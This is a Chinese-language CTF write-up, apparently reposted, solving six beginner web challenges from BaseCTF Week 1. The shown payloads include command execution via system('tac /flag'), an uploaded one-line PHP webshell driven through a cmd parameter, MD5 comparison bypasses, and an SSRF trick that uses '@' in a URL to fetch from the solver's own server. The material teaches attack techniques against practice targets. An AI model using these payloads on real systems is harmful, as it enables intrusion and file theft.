BaseCTF-web-Week1

news2024/12/23 19:35:52

写在前面:

题目类型还是比较全,也都是基础题型,适合刚入门 CTF 的萌新学习,我之前在学校实验室预备队招新赛中也有出过一些类似的基础题,欢迎大家参考。

SNERT预备队招新CTF体验赛-Web(SWCTF)icon-default.png?t=N7T8https://myon6.blog.csdn.net/article/details/133501612

 

 1、 HTTP 是什么呀

注意两个点:

(1)要求传入的 %00 需要先进行 url 编码后再传入,否则会被当做 url 编码直接转成空了;

(2)请求头需要添加 Content-Type: application/x-www-form-urlencoded 因为是 post 请求。

解 base64:

拿到 flag:BaseCTF{88e16242-bd8e-4886-8a51-cf2bcae1a226}

2、喵喵喵´•ﻌ•`

没有做任何过滤,直接 rce

当前目录未见 flag,看看根目录:

?DT=system('ls /');

读取 flag:

?DT=system('tac /flag');

拿到 flag:BaseCTF{7d34864d-ca1b-421b-8719-ecae8e681754} 

3、md5绕过欸

都采用数组绕过,payload:

?name[]=1&name2[]=1
post:password[]=2&password2[]=2

弱比较还可以采用一些特殊的字符串绕过,加密后以 0e 开头的,PHP 会当作科学计数法来处理,也就是 0 的 n 次方,得到的值比较的时候都相同,payload:

?name=240610708&name2[]=1
post:password=MAUXXQC&password2[]=2

拿到 flag:BaseCTF{c83310db-382f-4819-8fca-1c4e2b488281}

4、 A Dark Room

F12 看源码

拿到 flag:BaseCTF{c7f4e58b-0e7d-42a2-b85a-64c09c88a6c7}

5、upload

未作任何过滤,直接传一句话木马

右键我们上传的文件,复制地址 

访问是空白,说明解析成功

调用:

?cmd=system("ls /");

读取 flag: 

?cmd=system("tac /flag");

拿到 flag:BaseCTF{2c4de865-6ac2-4ca0-a673-cb284549521e}

6、Aura 酱的礼物

看到代码似曾相识

很像我之前出过的一个题哈哈哈,这个题的原型来自于一道很久远的 CTF 比赛的题,感兴趣的可以看看题目三 :myon123_easy_phpicon-default.png?t=N7T8https://myon6.blog.csdn.net/article/details/137141104#3%E3%80%81myon123_easy_php

下面我们继续说这道题的解法,代码审计:

先看第一部分

$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
    die('这是 Aura 的礼物,你不是 Aura!');
}

看到 file_get_contents 我们就应该想到文件包含,需要上伪协议(萌新学到后面会有的条件反射)

现在页面回显的就是:这是 Aura 的礼物,你不是 Aura!,我们让它消失:

一般我们用的是 php://input ,然后 post 再写入对应数据,但是这里它 pen 需要 post 请求提交,因此我们使用另一个伪协议 data://,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。

payload:

pen=data://text/plain,Aura

可以看到已经来到了第二个 die() 函数,也就是说我们已经成功绕过了第一个条件判断。

继续看第二个:

$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
    die('这不是 Aura 的博客!');
}

strpos() 函数用于查找字符串在另一字符串中第一次出现的位置,其返回值是字符串在另一字符串中第一次出现的位置,注意字符串位置是从 0 开始的,如果没有找到字符串则返回 FALSE。

这里要求不能等于 0 ,也就是说在传入的 $challenge 里需要找到 'http://jasmineaura.github.io',并且位置是开头,才会是返回的 0。

那就直接将内容传给它,这样查出来返回值就是 0:

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io

来到第三部分:

$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
    die('请去博客里面写下感想哦~');
}

这里会读取 $challenge 这个文件,准确来说这里的 $challenge 是一个文件的位置(路径),然后将读到的内容存入字符串 $blog_content 里,再次使用 strpos 函数查找,要求在内容里能找到 '已经收到Kengwang的礼物啦',因为如果找不到就会返回 false。

这里肯定不能再用 data:// 协议了,因为前面要求 $challenge 的开头必须是 'http://jasmineaura.github.io',那么怎么搞呢?我现在才明白这道题考点和我前面说的那道题不一样,这个我也是第一次遇到,看了它的 wp ,使用 @ 截断,将 @ 前的内容当做用户名,说实话我没太理解:

strpos($blog_content, '已经收到Kengwang的礼物啦') === false 这个检测怎么过的呢?

(后面用服务器测试后就明白了,以及 @ 的用法也有详细解释,往后看)

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@127.0.0.1

最后就是 include 文件包含,也是直接上伪协议就好了,这里用 php://filter 读文件源码。

payload:

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@127.0.0.1&gift=php://filter/read=convert.base64-encode/resource=flag.php

我本来是想换编码方式输出,但是没成功,那就再 base64 解码吧 

拿到 flag:BaseCTF{e2d5fe59-5bba-4a3b-a255-fe04a99f0198}

下面换服务器试试:

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@服务器ip地址&gift=php://filter/read=convert.base64-encode/resource=flag.php

当将 127.0.0.1 换成服务器 ip 地址后,发现就打不通了,说明它这里题目的设置就是只要改成读本地就能直接过,wp里也说了考虑到新生没有服务器。

为什么打不通了,因为压根就没过这个判断:

strpos($blog_content, '已经收到Kengwang的礼物啦') === false

随便在服务器启一个 web 服务,在网站目录下随便写一个文件:

我这里叫 1.txt,写这个东西干啥?给 file_get_contents 去读取。

1.txt 的内容如下:

也就是题目代码要求能查找到的内容

访问一下,没什么问题

构造 payload:

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@服务器ip地址/1.txt&gift=php://filter/read=convert.base64-encode/resource=flag.php

读取 flag.php 成功 

这个考点其实是 SSRF 了,我就说为什么传了 challenge=http://jasmineaura.github.io 请求耗时都变长了,因为它会去访问 http://jasmineaura.github.io 这个网站,所以现在也就更好理解前面说的 @ 截断的意思了,前面 http://jasmineaura.github.io@ 中的 jasmineaura.github.io 会被当做一个用户名信息,实际最后去访问的网站是我们服务器的ip地址,读取文件也就是我们写入的。

比如我们访问百度这个网站,我们可以这样输地址:

http://jasmineaura.github.io@baidu.com/

或者 

http://Myon@baidu.com/

回显出来的结果依旧是百度的页面 

在 URL 中,@ 符号前面的部分通常表示用户信息(例如用户名和密码),这种用法曾经用于需要在 URL 中嵌入用户名和密码的情况,但是由于安全原因,这种方式已逐渐被淘汰,现代浏览器大多不再支持直接从 URL 中提取用户名和密码进行身份验证。

BaseCTF-web-Week1 的题目讲解至此结束,希望看完对你学习 CTF 有帮助。

期待大家的关注与支持!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2076859.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ozon恢复产品,Ozon恢复销售在六月份暂时关闭的品类

在6月份,Ozon发布通知:《Ozon将限制中国卖家电子产品、汽车摩配、DIY工具的销售》今天,我们收到通知,6月被关闭的品类将被重新开放销售。 Ozon恢复销售在六月份暂时关闭的品类地址:m6z.cn/5H6fQR 6月份的消息一出&…

【卡码网C++基础课 13.链表的基础操作1】

目录 题目描述与分析一、指针二、链表三、定义链表节点四、链表的插入五、代码编写 题目描述与分析 题目描述: 构建一个单向链表,链表中包含一组整数数据。输出链表中的所有元素。 要求: 1.使用自定义的链表数据结构 2.提供一个 linkedList …

一篇精通Ansible之playbook

华子目录 前言playbook概念playbook结构理解playbook核心元素playbook特点与优势 playbook基本语法ansible-playbook命令ansible总结查看主机清单ansible配置文件单个play语法检测运行 多个play查看模块doc变量事实变量导入变量文件字典变量 机密数据管理在playbook中导入变量文…

PTA团体程序设计天梯赛

这次题目出得比前几次简单很多,但有几道题占用的时间太多,导致后面几题仓促写完,未能全部正确,还是得多练 目录 L1-2 九牛一毛 L1-3 小孩子才做选择,大人全都要 L1-5 试试手气 L1-6 打PTA L1-8 随机输一次 L2-…

QT5.15.2加载mysql驱动-QMYSQL driver not loaded解决方法

Available drivers: "QSQLITE" "QODBC" "QODBC3" "QPSQL" "QPSQL7" QSqlDatabase: QMYSQL driver not loaded QSqlDatabase: available drivers: QSQLITE QODBC QODBC3 QPSQL QPSQL7 源码下载(若存在&#xff0…

029集—CAD VBA识别“Esc”退出键——vba代码实现

vba程序运行时我们想按下“Esc”键时退出程序或做出进一步相应, 此时可借助windows API函数实现。 见下图: 部分代码如下: #If VBA7 Then 64位系统声明Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)…

【C++从练气到飞升】16---二叉搜索树

🎈个人主页:库库的里昂 ✨收录专栏:C从练气到飞升 🎉鸟欲高飞先振翅,人求上进先读书🎉 目录 ⛳️推荐 一、二叉搜索树概念 二、二叉搜索树的操作 2.1 二叉搜索树的查找 2.2 二叉搜索树的插入 2.3 二叉…

Linux基础 - yum、rzsz、vim 使用与配置、gcc/g++的详细解说

目录 一、Linux 软件包管理器 yum A.什么是软件包? B.关于rzsz,yum的配置 1.安装 sz,rz 命令: a.执行命令sz可将linux中的文件传输到Windows中 b.执行rz命令可将Windows中的文件传输到linux 2.scp XXX.tgz 用户名另一台lin…

BCLinux Euler 21.10 安装mysql 8.0.37 (二进制安装)

下载mysql安装包 #根据ldd --version的信息, 下载的是glic 2.28的包。 下载地址:https://downloads.mysql.com/archives/community/ 包名:mysql-8.0.37-linux-glibc2.28-x86_64.tar.xz#root用户操作 #系统环境:BigCloud Enterpri…

注册安全分析报告:助通信息

前言 由于网站注册入口容易被黑客攻击,存在如下安全问题: 暴力破解密码,造成用户信息泄露短信盗刷的安全问题,影响业务及导致用户投诉带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞…

Python操作ES

代码说明: 连接 Elasticsearch:使用 basic_auth 参数进行认证。测试连接:获取集群的健康状态,并格式化输出结果。索引文档:将一个文档索引到指定的索引中,并格式化输出结果。搜索文档:在指定的…

【python计算机视觉编程——2.局部图像描述子】

python计算机视觉编程——2.局部图像描述子 2.局部图像描述子2.1 Harris角点检测器在图像间寻找对应点 2.2 SIFT(尺度不变特征变换)2.2.3 检测兴趣点2.2.4 匹配描述子 2.3 匹配地理标记图像 2.局部图像描述子 2.1 Harris角点检测器 算法步骤 计算图像梯…

JS New Worker() 深度解析

JS New Worker() 深度解析 文章目录 一、New Worker() 是什么及为什么出现二、JS中如何使用 New Worker()1. 创建 Worker 线程2. 向 Worker 发送消息3. 接收 Worker 的消息4. 监听错误和结束事件5. 终止 Worker 三、Worker 包含哪些属性或方法 API1. 属性2. 方法 四、扩展与高级…

customRef 与 ref

ref() 我们已经很熟悉了,就是用来定义响应式数据的,其底层原理还是通过 Object.defineprotpty 中的 get 实现收集依赖( trackRefValue 函数收集),通过 set 实现分发依赖通知更新( triggerRefValue 函数分发 )。我们看看 ref 的源码就知道了 …

适合学生党用的充电宝有哪些?四款百元性价比充电宝推荐

在如今这个电子设备不离手的时代,充电宝成为了学生党们的必备好物。无论是在教室、图书馆学习,还是外出游玩,一款可靠的充电宝能够为手机、平板等设备随时补充电量,让你不再为电量焦虑而烦恼。今天,我们就为学生党们精…

AES对称加密算法

1. 简介 AES是一种对称加密算法, 它有3种类型: AES-128: 密钥为128位(16字节)的AES, 加密10轮AES-192: 密钥为192位(24字节)的AES, 加密12轮AES-256: 密钥为256位(32字节)的AES, 加密14轮 密钥长度越长, 加密的强度越大, 当然与此同时开销也越大。每种类型下都有几种操作模式…

【JavaEE】深入浅出 Spring AOP:概念、实现与原理解析

目录 Spring AOPAOP概述Spring AOP快速⼊⻔引⼊AOP依赖编写AOP程序 Spring AOP 详解Spring AOP核⼼概念切点(Pointcut)连接点(Join Point)通知(Advice)切⾯(Aspect) 通知类型PointCut切⾯优先级 Order切点表达式execution表达式annotation⾃定义注解 MyAspect切⾯类添加⾃定义注…

力扣第71题:简化路径 放弃栈模拟,选择数据流√(C++)

目录 题目 思路 解题过程 复杂度 Code 题目 给你一个字符串 path ,表示指向某一文件或目录的 Unix 风格 绝对路径 (以 / 开头),请你将其转化为更加简洁的规范路径。 在 Unix 风格的文件系统中,一个点&#xff…

K8S持久化存储数据volumeMountsvolumes

环境: Ubuntu-1:192.168.114.110作为主 Ubuntu-2:192.168.114.120作为从1,node节点1 Ubuntu-3:192.168.114.130作为从2,node节点2 持久化volumeMounts pod里面:emptyDir和hostPath。存储在node,NFS...,Clo…

文本处理函数

1.文本的提取 left mid right 2.文本的查找与替换 replace,substitute 3.字符个数 len字符 lenb字节, office365好像没有此功能 4.数据的清理 clean , trim 5.找不同 exact